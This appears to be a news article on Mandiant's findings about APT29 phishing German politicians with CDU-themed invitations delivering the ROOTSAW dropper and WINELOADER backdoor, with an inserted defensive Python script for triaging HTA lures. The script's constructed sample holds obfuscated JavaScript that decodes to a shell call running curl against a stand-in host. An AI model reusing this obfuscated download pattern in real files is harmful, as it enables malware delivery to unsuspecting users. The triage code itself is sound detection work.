Hackers linked to Russia’s Foreign Intelligence Service have been observed deploying phishing techniques to snare German politicians.
Researchers of the Google-owned Mandiant security firm have outlined the details of a Russian hacking campaign targeting political parties in Germany.
Mandiant believes the group is APT29, a threat actor with ties to Russia's Foreign Intelligence Service (SVR).
According to Mandiant, APT29 has historically gone after governments and diplomats; targeting political parties is a new twist in the threat actor's tactics, techniques, and procedures.
This new campaign also marks the first time APT29 has been observed using phishing lures written in German, in this case email invitations to a dinner reception. The invitations carry the logo of the German Christian Democratic Union (CDU) political party. The link in the invitation sends victims to a compromised WordPress website, which serves the threat actor's first-stage payload, dubbed ROOTSAW.
ROOTSAW is delivered as a second document, again styled to look like legitimate CDU material, that is shared with the victim. Invariably named as some form of invitation, the document hides an obfuscated JavaScript payload that, when run, downloads the final payload: a backdoor Mandiant is calling WINELOADER.
The backdoor communicates with APT29's command-and-control (C2) infrastructure and reports details of the infected machine, so the operators can decide whether the system is a worthwhile target for further action. WINELOADER shares code and techniques with prior APT29 malware, with some unique additions.
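The chain described above (a document-themed lure carrying obfuscated JavaScript that fetches a payload) is something an analyst can often triage statically before detonating anything. The script below is an added example and is not Mandiant's tooling or the actual ROOTSAW code: it decodes two common JavaScript obfuscation layers (String.fromCharCode and percent-escaped strings passed to unescape), then looks for script-host and download behaviour and any URLs that only appear after decoding. The HTA-style sample, its domain and its path are constructed for this illustration and are not indicators from the campaign.

```python
"""Static triage for HTML-application (.hta) lures hiding obfuscated JavaScript.

Added example, not Mandiant's tooling and not ROOTSAW's real code. The sample
below and every URL in it are constructed for illustration only.
"""
import re

# Constructed sample: an HTA that builds its download URL from character
# codes and hides the shell call behind percent-encoding. Invented here.
SAMPLE_HTA = r"""<html><head><title>Einladung</title>
<HTA:APPLICATION ID="inv" WINDOWSTATE="minimize" SHOWINTASKBAR="no">
<script language="javascript">
var u = String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,119,112,45,99,111,110,116,101,110,116,47,105,110,118,105,116,101,46,122,105,112);
var s = new ActiveXObject("WScript.Shell");
eval(unescape("%73%2e%52%75%6e%28%27%63%6d%64%20%2f%63%20%63%75%72%6c%20%27%2b%75%29"));
</script></head><body></body></html>"""

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
PCT_ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")
URL = re.compile(r"https?://[^\s'\"<>]+")

# Behaviours worth flagging in a document that claims to be an invitation.
SUSPICIOUS = {
    "charcode_obfuscation": re.compile(r"String\.fromCharCode\s*\("),
    "percent_escapes": re.compile(r"\bunescape\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "activex": re.compile(r"ActiveXObject\s*\(", re.I),
    "shell_run": re.compile(r"\.Run\s*\(", re.I),
    "hidden_window": re.compile(r"WINDOWSTATE\s*=\s*\"?minimize", re.I),
}


def decode_fromcharcode(text: str) -> str:
    """Replace String.fromCharCode(n, n, ...) with the literal string it builds."""
    def repl(m: re.Match) -> str:
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE.sub(repl, text)


def decode_percent(text: str) -> str:
    """Resolve %XX escapes (what JavaScript's unescape() would produce)."""
    return PCT_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def deobfuscate(text: str, rounds: int = 3) -> str:
    """Apply the decoders repeatedly, since layers are commonly nested."""
    for _ in range(rounds):
        new = decode_percent(decode_fromcharcode(text))
        if new == text:
            break
        text = new
    return text


def triage(hta_text: str) -> dict:
    """Return the behaviours seen (raw or decoded) and any URLs recovered."""
    decoded = deobfuscate(hta_text)
    indicators = sorted(
        name for name, rx in SUSPICIOUS.items()
        if rx.search(hta_text) or rx.search(decoded)
    )
    return {
        "indicators": indicators,
        "urls": sorted(set(URL.findall(decoded))),
        "decoded_script": decoded,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_HTA)
    print("indicators:", ", ".join(report["indicators"]))
    print("urls:", report["urls"])
```

The URL search is deliberately run on the decoded text only: on the raw sample it finds nothing, which is exactly the gap a lure like this relies on. The percent decoder is a triage heuristic and will also rewrite legitimately URL-encoded strings, so treat the recovered URLs as leads to confirm in a sandbox, not as verdicts.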
And while German parties seem to be the main target, Mandiant feels that is likely to change.
“Based on the SVR’s responsibility to collect political intelligence and this APT29 cluster’s historical targeting patterns,” Mandiant said in a blog post, “we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum.”
APT29, also known as Cozy Bear, Midnight Blizzard, and a raft of other names, was first observed by Russian security firm Kaspersky Lab, no less, in 2008. Since then, the group has been held responsible for hacks against the Pentagon in 2015 and the Democratic National Committee in 2016.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.